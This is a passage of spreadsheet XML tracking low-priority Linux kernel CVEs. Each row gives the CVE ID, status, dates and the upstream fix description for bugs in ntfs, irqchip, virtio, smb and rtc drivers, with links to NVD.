lands in the adjacent page, and *dest_ofs is left one past the sub-block
end (the later `*dest_ofs &amp;= ~PAGE_MASK` then yields 1, not 0, so the page
is never finalized and later sub-blocks keep writing further past it).  A
corrupted compressed $DATA attribute thus produces a bounded run of
out-of-bounds writes when the file is read.
Break as soon as dp_addr reaches dp_sb_end; a full sub-block still
completes, as its final copy advances dp_addr to exactly dp_sb_end.</t>
        </is>
      </c>
      <c r="T486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90118</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90119</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2026-09-17</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q487" s="5" t="inlineStr"/>
      <c r="R487" s="5" t="inlineStr"/>
      <c r="S487" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: ice1712: Fix the card leak at probe error with the auto-cleanup
snd_ice1712_probe() performs multiple initialization steps after
snd_card_new(), but directly returns on failures from later steps
without releasing the ALSA card, causing resource leaks when
probing fails.
Use snd_devm_card_new() together with scope-based cleanup
via __free(snd_card_unref), and clear the card pointer after
successful registration to keep it alive.</t>
        </is>
      </c>
      <c r="T487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90119</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90120</t>
        </is>
      </c>
      <c r="D488" s="5" t="inlineStr"/>
      <c r="E488" s="5" t="inlineStr"/>
      <c r="F488" s="5" t="inlineStr"/>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="inlineStr"/>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q488" s="5" t="inlineStr"/>
      <c r="R488" s="5" t="inlineStr"/>
      <c r="S488" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
irqchip/gic-v5: Check get_logical_index() return value in MADT IAFFID parsing
In gic_acpi_parse_iaffid() a given MADT GICC entry might not correspond
to a logical cpu recognized by the kernel, resulting in the cpu variable
initialization to an error value.
Currently, the get_logical_index() return value is not checked for failure,
which might result in out-of-bounds memory corruption while trying to
index a per_cpu variable array.
Add a check to evaluate get_logical_index() return value.</t>
        </is>
      </c>
      <c r="T488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90120</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90121</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2026-09-17</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q489" s="5" t="inlineStr"/>
      <c r="R489" s="5" t="inlineStr"/>
      <c r="S489" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
irqchip/gic-v5: Clear per-CPU IRS data on teardown
IRS affinity setup publishes an IRS pointer and IAFFID state in the
per-CPU data before the remaining IRS initialization can fail. The
error path then frees the IRS data without clearing that published
state, leaving CPUs associated with freed memory.
On initialization failure and normal IRS teardown, clear the per-CPU
IRS association by removing the stale pointer to irs_data. Also
invalidate the per-CPU IAFFID state for any CPUs that were tied to the
IRS before it was freed.</t>
        </is>
      </c>
      <c r="T489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90121</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90122</t>
        </is>
      </c>
      <c r="D490" s="5" t="inlineStr"/>
      <c r="E490" s="5" t="inlineStr"/>
      <c r="F490" s="5" t="inlineStr"/>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="inlineStr"/>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q490" s="5" t="inlineStr"/>
      <c r="R490" s="5" t="inlineStr"/>
      <c r="S490" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clk: visconti: Make sure clk_init_data is fully initialized
The clk_init_data structure contains several mutually-exclusive members
for different methods to specify the possible parents of a clock,
prompting drivers to initialize only the members they need.  However,
not initializing all members may cause subtle issues, which are only
exposed when CONFIG_INIT_STACK_ALL_PATTERN or CONFIG_INIT_STACK_NONE is
enabled.
visconti_clk_register_gate() fills in init.parent_data, and assumes that
init.parent_names is NULL.  However, the latter in uninitialized, and
thus may cause a crash.
Make sure all members are fully initialized, to fix such bugs, and to
avoid future breakage when converting drivers to a different method for
specifying the parents.</t>
        </is>
      </c>
      <c r="T490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90122</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90123</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2026-09-17</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q491" s="5" t="inlineStr"/>
      <c r="R491" s="5" t="inlineStr"/>
      <c r="S491" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
irqchip/ast2700-intc: Avoid allocating in the irq_domain activate() callback
The interrupt core calls the irq_domain_activate() callback from
__setup_irq() with desc-&gt;lock held and interrupts disabled. Both
aspeed_intc1_irq_domain_activate() and aspeed_intc0_resolve_route() test a
compatible string with fwnode_device_is_compatible().
fwnode_device_is_compatible() invokes fwnode_property_match_string(), which
allocates with GFP_KERNEL. That's obviously not possible with interrupts
disabled and a raw spinlock held.
Both call sites are only ever handed OF nodes, so use
of_device_is_compatible() instead: it walks the property in place and does
not allocate.</t>
        </is>
      </c>
      <c r="T491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90123</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90124</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2026-09-17</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q492" s="5" t="inlineStr"/>
      <c r="R492" s="5" t="inlineStr"/>
      <c r="S492" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
irqchip/renesas-rzg2l: Fix loss of interrupt
rzg2l_clear_irq_int() and rzg2l_clear_tint_int() perform a
read-modify-write on the ISCR/TSCR status registers to clear the bit
for the interrupt just handled. Since these registers are
write-0-to-clear per bit, this is racy:
If another interrupt's status bit gets set between the read and the write,
that bit is written back as 0 by the software-constructed value, clearing
an interrupt that hasn't been serviced yet and losing it.
This can be reproduced by triggering multiple interrupts at once, e.g.:
  gpioset -c gpiochip0 355=0 353=0 328=0 352=0
Fix this by writing back only the bit being cleared, with all other bits
set to 1, instead of read-modify-writing the whole register.  Since 1-bits
are left unchanged by hardware, concurrently-set status bits for other
interrupts are preserved.</t>
        </is>
      </c>
      <c r="T492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90124</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90125</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2026-09-17</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q493" s="5" t="inlineStr"/>
      <c r="R493" s="5" t="inlineStr"/>
      <c r="S493" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix request buffer leak in smb2_new_read_req()
smb2_new_read_req() allocates the request buffer with
smb2_plain_req_init() but only publishes it to the caller with
*buf = req at the very end of the function. Two error returns sit in
between:
	rc = smb2_plain_req_init(SMB2_READ, io_parms-&gt;tcon, server,
				 (void **) &amp;req, total_len);
	if (rc)
		return rc;
	if (server == NULL)
		return -ECONNABORTED;
	[...]
		rdata-&gt;mr = smbd_register_mr(server-&gt;smbd_conn,
					     &amp;rdata-&gt;subreq.io_iter,
					     true, need_invalidate);
		if (!rdata-&gt;mr)
			return -EAGAIN;
On either of them the buffer is neither released nor handed back, so
it is leaked. The caller cannot clean up after it: smb2_async_readv()
does 'goto out' on a non-zero return, which skips the
cifs_small_buf_release(buf) at async_readv_out, and buf has not been
assigned at that point in any case.
The write path has never had this problem. smb2_async_writev()
registers the memory region inline and jumps to its release label
instead of returning:
	wdata-&gt;mr = smbd_register_mr(...);
	if (!wdata-&gt;mr) {
		rc = -EAGAIN;
		goto async_writev_out;
	}
Commit b7972092199f ("cifs: smbd: Retry on memory registration
failure") changed both sides from -ENOBUFS to -EAGAIN in a single
patch, which puts the two shapes next to each other.
Only the -EAGAIN return is reachable in practice, because
smb2_plain_req_init() calls smb2_reconnect() first and that already
fails with -EIO when server is NULL, before anything is allocated.
Both returns are given the same treatment here rather than leaving
one of them correct only by accident.
Because -EAGAIN is a replayable error, the failure also reaches the
retry block at the end of smb2_async_readv(), which marks the
subrequest NETFS_SREQ_NEED_RETRY, so a failing registration can be
retried rather than ending the I/O, and every attempt that reaches it
leaks another buffer. smb2_should_replay() short-circuits on
tcon-&gt;retry, so on a hard mount the attempt count is not bounded by
the retrans setting.
Only the asynchronous read path is affected. The synchronous
SMB2_read() caller passes rdata == NULL and the memory registration
block is guarded on rdata.
The memory registration failure path was pointed out by the Sashiko
AI reviewer while it was reviewing an unrelated patch to
smb2_async_readv().</t>
        </is>
      </c>
      <c r="T493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90125</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90126</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2026-09-17</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q494" s="5" t="inlineStr"/>
      <c r="R494" s="5" t="inlineStr"/>
      <c r="S494" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rtc: pcf8563: fix clock provider leak on unbind
pcf8563_clkout_register_clk() registers the CLKOUT clock provider with
of_clk_add_provider(), but nothing ever unwinds it: there is no
of_clk_del_provider() call and the driver has no remove callback. Each
of_clk_add_provider() allocates a struct of_clk_provider, takes a
reference on the OF node and adds an entry to the global of_clk_providers
list, none of which is released when the device is unbound. Every
bind/unbind (or module reload) therefore leaks a provider structure and
an of_node reference.
The clock itself is already device-managed (devm_clk_register()); only
the provider registration was not. Use devm_of_clk_add_hw_provider() so
the provider is removed automatically on unbind. Tie it to the parent
i2c device, whose OF node carries the #clock-cells and clock-output-names
properties (the RTC class device has no OF node of its own).</t>
        </is>
      </c>
      <c r="T494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90126</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90127</t>
        </is>
      </c>
      <c r="D495" s="5" t="inlineStr"/>
      <c r="E495" s="5" t="inlineStr"/>
      <c r="F495" s="5" t="inlineStr"/>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="inlineStr"/>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q495" s="5" t="inlineStr"/>
      <c r="R495" s="5" t="inlineStr"/>
      <c r="S495" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio: rtc: time out alarm requests
RTC class operations run with rtc_device.ops_lock held. The virtio RTC
alarm requests currently wait without a timeout for the device to return
their requestq buffers.
On surprise removal, virtio-pci marks the virtqueues broken before
unregistering the virtio device. If an alarm request is waiting when the
device stops responding, viortc_remove() blocks in viortc_class_stop()
while trying to acquire ops_lock. The request cannot complete and device
removal hangs until the waiting task is signalled.
Use the same 60-second timeout as clock read requests for alarm reads,
alarm programming, and alarm interrupt enable requests. The existing
message reference counting keeps a timed-out request alive until a late
response or device teardown.</t>
        </is>
      </c>
      <c r="T495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90127</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90128</t>
        </is>
      </c>
      <c r="D496" s="5" t="inlineStr"/>
      <c r="E496" s="5" t="inlineStr"/>
      <c r="F496" s="5" t="inlineStr"/>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="inlineStr"/>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q496" s="5" t="inlineStr"/>
      <c r="R496" s="5" t="inlineStr"/>
      <c r="S496" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vdpa/mlx5: fix wrong list iterated in add_direct_chain error path
In add_direct_chain(), newly allocated direct MR entries are added to
the local list 'tmp', which is spliced into mr-&gt;head only on success.
On the error path, the cleanup loop was incorrectly iterating over
mr-&gt;head instead of tmp.
Fix by iterating over 'tmp' in the err_alloc cleanup path.</t>
        </is>
      </c>
      <c r="T496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90128</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90129</t>
        </is>
      </c>
      <c r="D497" s="5" t="inlineStr"/>
      <c r="E497" s="5" t="inlineStr"/>
      <c r="F497" s="5" t="inlineStr"/>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="inlineStr"/>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q497" s="5" t="inlineStr"/>
      <c r="R497" s="5" t="inlineStr"/>
      <c r="S497" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio_balloon: quiesce balloon work before device shutdown
Commit 8bd2fa086a04 ("virtio: break and reset virtio devices on
device_shutdown()") added a generic virtio bus .shutdown handler that
breaks and resets every virtio device during device_shutdown(), i.e. on
reboot and kexec.
virtio_balloon provides no .shutdown of its own, so that generic path
runs while the balloon's asynchronous work is still armed. Once the
device has been broken, virtqueue_add_inbuf() in
virtballoon_free_page_report() returns -EIO and trips its
WARN_ON_ONCE(). On a kernel booted with panic_on_warn that turns an
ordinary reboot, for example a kexec based upgrade, into a fatal panic
in the middle of device_shutdown(), so the machine never reaches the
new kernel.
Relaxing that single WARN_ON_ONCE() would only hide the symptom: the
inflate/deflate and OOM paths do not warn, they call
wait_event(vb-&gt;acked, ...) and would instead block forever on a broken
queue that can no longer complete. The device has to be quiesced, not
just kept quiet.
Add a .shutdown handler that quiesces the balloon via the shared
virtballoon_quiesce() helper while the device is still alive, and only
then breaks and resets it via virtio_device_shutdown(). Unlike
virtballoon_remove() the balloon workqueue is not destroyed, as shutdown
does not free the device and cancel_work_sync() together with stop_update
already prevent any further work from being queued.</t>
        </is>
      </c>
      <c r="T497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90129</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90130</t>
        </is>
      </c>
      <c r="D498" s="5" t="inlineStr"/>
      <c r="E498" s="5" t="inlineStr"/>
      <c r="F498" s="5" t="inlineStr"/>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="inlineStr"/>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q498" s="5" t="inlineStr"/>
      <c r="R498" s="5" t="inlineStr"/>
      <c r="S498" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vdpa_sim: fix cleanup after worker creation failure
vdpasim_create() leaves vdpasim-&gt;worker as an ERR_PTR when
kthread_run_worker() fails. The error path then drops the device
reference, which releases the partially initialized simulator.
vdpasim_free() unconditionally passes the worker pointer to
kthread_destroy_worker(), so the ERR_PTR is dereferenced and can trigger
a general protection fault.
Store the worker error, clear the pointer, and only clean up the worker
when it was successfully initialized. Also make the release path tolerate
partially initialized objects by guarding virtqueue and IOTLB cleanup,
since the same release path can be reached from other initialization
failures.
I found this bug myself, though the patch was written with AI assistance.</t>
        </is>
      </c>
      <c r="T498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90130</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90131</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2026-09-17</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q499" s="5" t="inlineStr"/>
      <c r="R499" s="5" t="inlineStr"/>
      <c r="S499" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: serialize resident iomap reads with mrec_lock
ntfs_read_iomap_begin_resident() walks the MFT record through
ntfs_attr_lookup() -&gt; ntfs_attr_find() without taking ni-&gt;mrec_lock,
while ntfs_attr_record_resize(), ntfs_make_room_for_attr() and
ntfs_resident_attr_record_add() memmove() the same base_ni-&gt;mrec buffer
under that lock. map_mft_record() only takes a reference and does not
serialize, so the reader can observe torn attribute length and offset
fields while a writer is relocating the records.
KCSAN reports the race between the mmap read fault path and both link()
and unlink():
  BUG: KCSAN: data-race in ntfs_attr_find / ntfs_attr_record_resize
  write to 0xffff888100af1018 of 4 bytes by task 96 on cpu 1:
   ntfs_attr_record_resize+0xd2/0x130
   ntfs_attr_record_rm+0xad/0x530
   ntfs_delete+0x224/0x640
   ntfs_unlink+0x14d/0x280
   vfs_unlink+0x157/0x520
  read to 0xffff888100af1018 of 4 bytes by task 95 on cpu 0:
   ntfs_attr_find+0x104/0x5b0
   ntfs_attr_lookup+0x39c/0x10c0
   ntfs_read_iomap_begin_resident+0xc6/0x230
   ntfs_read_iomap_begin+0x5d/0xa0
   iomap_iter+0x2e2/0x6e0
   iomap_read_folio+0x147/0x2a0
   ntfs_read_folio+0x108/0x170
   filemap_read_folio+0x35/0x100
   filemap_fault+0x993/0x1000
  value changed: 0x00000250 -&gt; 0x000001f0
The address is mrec + 0x18, i.e. mft_record.bytes_in_use, and the change
is the 96 bytes of one $FILE_NAME attribute being removed.
Keep base_ni-&gt;mrec_lock from the resident read iomap lookup through
iomap_end(). This protects both the attribute walk and the subsequent copy
from iomap-&gt;inline_data, which points into the MFT record. The non-resident
path is left alone: ntfs_lookup() already holds the directory inode's
mrec_lock when it reads an index folio through read_mapping_folio(), and
taking the lock in the shared wrapper deadlocks there with recursive locking
on mrec_lock. The comment above the read_mapping_folio() call in
fs/ntfs/dir.c notes the same hazard.
The seek path uses the same lookup helper but does not dereference
iomap-&gt;inline_data. Release the lock before returning from that path,
whereas the regular read path records base_ni in iomap-&gt;private and releases
the lock from its iomap_end() callback.
Tested with a reproducer that faults in a 16-byte resident file while
another thread runs link()/unlink() on it. Before: 40 KCSAN reports in
about one second. After: no reports in 180 seconds over 206,090 read
iterations and 423,540 link/unlink cycles. A PROVE_LOCKING build shows no
lockdep splat with the same reproducer running for 60 seconds.</t>
        </is>
      </c>
      <c r="T499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90131</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90132</t>
        </is>
      </c>
      <c r="D500" s="5" t="inlineStr"/>
      <c r="E500" s="5" t="inlineStr"/>
      <c r="F500" s="5" t="inlineStr"/>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="inlineStr"/>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr"/>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q500" s="5" t="inlineStr"/>
      <c r="R500" s="5" t="inlineStr"/>
      <c r="S500" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: reject unprivileged writes to reserved $LX* xattrs
Reject setxattr of the reserved $LXUID, $LXGID, $LXMOD and $LXDEV names
from userspace unless the caller has CAP_SYS_ADMIN.</t>
        </is>
      </c>
      <c r="T500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90132</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90133</t>
        </is>
      </c>
      <c r="D501" s="5" t="inlineStr"/>
      <c r="E501" s="5" t="inlineStr"/>
      <c r="F501" s="5" t="inlineStr"/>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="inlineStr"/>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q501" s="5" t="inlineStr"/>
      <c r="R501" s="5" t="inlineStr"/>
      <c r="S501" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: Fix index_root heap OOB write in ntfs_ir_to_ib()
ntfs_ir_to_ib copies all entries from index_root into a freshly allocated
index_block_size-byte buffer without verifying that the entries fit in the
available space. The entries in index_root may be larger than the usable
entry space in the index block.
This can cause OOB writes past the end of the allocation.
The validator ntfs_index_root_inconsistent() checks that entries are
self-consistent within the IR value, but never cross-checks them against
index_block_size. There is no bounds check in ntfs_ir_to_ib() before the
memcpy.
Fixing this at the sink in ntfs_ir_to_ib() since
ntfs_index_root_inconsistent() validates the logical consistency of
index_root as a structure and a root with large entries is a structurally
valid root. The bug is a size conflict of ntfs_ir_to_ib().
Also, the validator is called once per inode load in
ntfs_read_locked_inode() while ntfs_ir_to_ib() is only called during a
reparent, a check there adds no overhead to the common path.
Moreover, even a future call path that bypasses the validator would still
be protected.
With NULL as first parameter of ntfs_error(), the volume error flag is
never set by this call, so the device name will be absent from the error
message. In any case, that the caller, ntfs_ir_reparent(), prints an error
message that includes the device name on NULL returns.
I think this is the best solution available without adding
'struct super_block *sb' as a parameter to ntfs_ir_to_ib().
This heap out-of-bounds write is triggered by a crafted filesystem image,
which is not in the kernel threat model, anyway, fixing memory errors would
be nice to keep  things secure.</t>
        </is>
      </c>
      <c r="T501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90133</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90134</t>
        </is>
      </c>
      <c r="D502" s="5" t="inlineStr"/>
      <c r="E502" s="5" t="inlineStr"/>
      <c r="F502" s="5" t="inlineStr"/>
      <c r="G502" s="5" t="inlineStr"/>
